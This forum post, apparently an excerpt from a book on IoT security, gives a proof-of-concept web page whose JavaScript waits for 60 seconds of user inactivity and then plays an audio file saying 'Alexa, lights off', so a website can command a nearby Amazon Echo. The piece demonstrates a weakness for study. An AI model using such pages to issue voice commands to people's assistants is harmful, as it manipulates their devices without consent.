Abusing the Internet of Things

(Rick Simeone) #1

At this point, the user can say “Alexa, turn off lights,” and the Amazon Echo will dutifully
cause all 17 lights to go off. Learning from the Microsoft Vista security issue, we can easily
simulate a proof-of-concept scenario in which a website plays an audio file instructing Alexa to
turn off the lights. Consider a website with the following JavaScript:


<HTML>
<BODY>
<SCRIPT>
  var IDLE_TIMEOUT = 60; // in seconds
  var _idleSecondsCounter = 0;

  // Any mouse or keyboard activity resets the idle counter.
  document.onclick = function () {
    _idleSecondsCounter = 0;
  };
  document.onmousemove = function () {
    _idleSecondsCounter = 0;
  };
  document.onkeypress = function () {
    _idleSecondsCounter = 0;
  };

  // Check the idle counter once per second.
  window.setInterval(CheckIdleTime, 1000);

  function CheckIdleTime() {
    _idleSecondsCounter++;
    if (_idleSecondsCounter >= IDLE_TIMEOUT) {
      // Idle threshold reached: play the recorded voice command.
      var audio = new Audio('alexa_lights_off.m4a');
      audio.play();
      _idleSecondsCounter = 0;
    }
  }
</SCRIPT>
</BODY>
</HTML>

This JavaScript (slightly modified from the original version available from
http://stackoverflow.com/a/13246534) plays the audio file alexa_lights_off.m4a when the
browser notices that there have been no mouse or keyboard movements for 60 seconds. The
audio file contains the words, “Alexa, lights off.” This rudimentary proof of concept shows
how an external website can use audio assistants like the Amazon Echo to influence
connected devices.

